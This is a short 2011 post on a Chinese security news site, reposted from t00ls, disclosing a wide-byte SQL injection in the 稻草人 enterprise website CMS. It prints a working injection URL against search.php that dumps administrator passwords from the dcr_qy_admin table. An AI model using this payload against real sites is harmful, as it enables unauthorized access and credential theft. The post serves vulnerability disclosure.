游侠安全网
  • 业界
  • 安全
  • 网络
  • 办公
  • 厂商
  • 培训
  • 应用
  • 影音
  • 数码
  • 文摘
  • 猎头
  • 程序
  • 站长
  • 系统
  • 随笔
  1. 首页
  2. /
  3. 站长
  4. /
  5. 稻草人企业站管理系统宽字节注入
站长

稻草人企业站管理系统宽字节注入

2011年5月16日 网路游侠 1 分钟阅读 0 评论

  偶然在站长下载站下了一套企业建站程序
  发现人气还蛮高的

  下载地址
  http://down.chinaz.com/soft/26802.htm

  就去测试一下发现了一个宽字节注入漏洞

http://127.0.0.1/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23

  爆密码的效果如下

  转自:t00ls

相关内容:

  • 【鼎源资讯】苹果 iOS 9.1-9.3.4 完美越狱发布,支持 32 位设备
  • 瑞星紧急发布周一应对“WanaCrypt”蠕虫敲诈病毒的开机指南
  • 阿拉斯一地区遭黑客攻击后 已付清黑客索要的比特币
  • 关注于渗透测试及数字取证的发行版 Parrot 发布 3.11 版本
  • 韩国警方:三年来全国有7家加密货币交易所和158个钱包遭黑客攻击
  • 挖矿病毒控制389万台PC 非法获利1500 余万元
企业网站管理系统 稻草人企业站管理系统
← 上一篇
风讯FoosunCMS浏览目录创建文件漏洞&xss+up上传鸡肋漏洞利用
下一篇 →
网易与奇虎360就邮箱安全深度合作

相关文章

告别繁琐代码!WordPress 网站添加统计代码的终极解决方案

8 周零广告从 0 涨至 1.5 万活跃用户:Claude+AEO+SEO 完整获客套路

14款开源蜜罐及免费蜜罐产品

游侠推荐:14款开源蜜罐及免费蜜罐产品

最近更新

  • 推荐一款简单轻量的自助Git客户端- Gitea
  • 正式发布:UShield - U盘卫士拍照版、WinLog Insight - Windows日志分析软件
  • 网络数据安全风险评估办法(全文)
  • EISS-AI安全之北京站(2026.06.26/周五/北京)
  • 修复 openEuler-24.03-LTS-SP3 的 CVE-2025-32463 漏洞
  • “养虾”实现一键办公? 当心隐私被OpenClaw泄露
  • WinLog Insight —— 让Windows日志分析,一键到位!
  • 法国政府加密通讯平台 Tchap 遭黑客入侵,官方宣称加密聊天记录未泄露
  • 告别繁琐代码!WordPress 网站添加统计代码的终极解决方案
  • UShield-U盘卫士拍照版:记录U盘插拔、文件操作,并可拍照的软件

网安大全

自2014年2月22日始,“游侠安全网”就在维护《中国网络安全产品和厂家大全》,您可以点击这里获取最新版。如果您可以分享给朋友,游侠表示感谢!

微信公众号

“游侠安全网”微信公众号游侠安全网微信公众号

游侠安全网

游侠安全网 — 关注网络安全、信息安全、黑客技术与IT资讯。
微 GH

快速导航

  • 业界
  • 安全
  • 网络
  • 办公
  • 厂商
  • 培训
  • 应用
  • 影音
  • 数码
  • 文摘
  • 猎头
  • 程序
  • 站长
  • 系统
  • 随笔
© 2005-2026 游侠安全网. 保留所有权利. 陕ICP备11003551号-2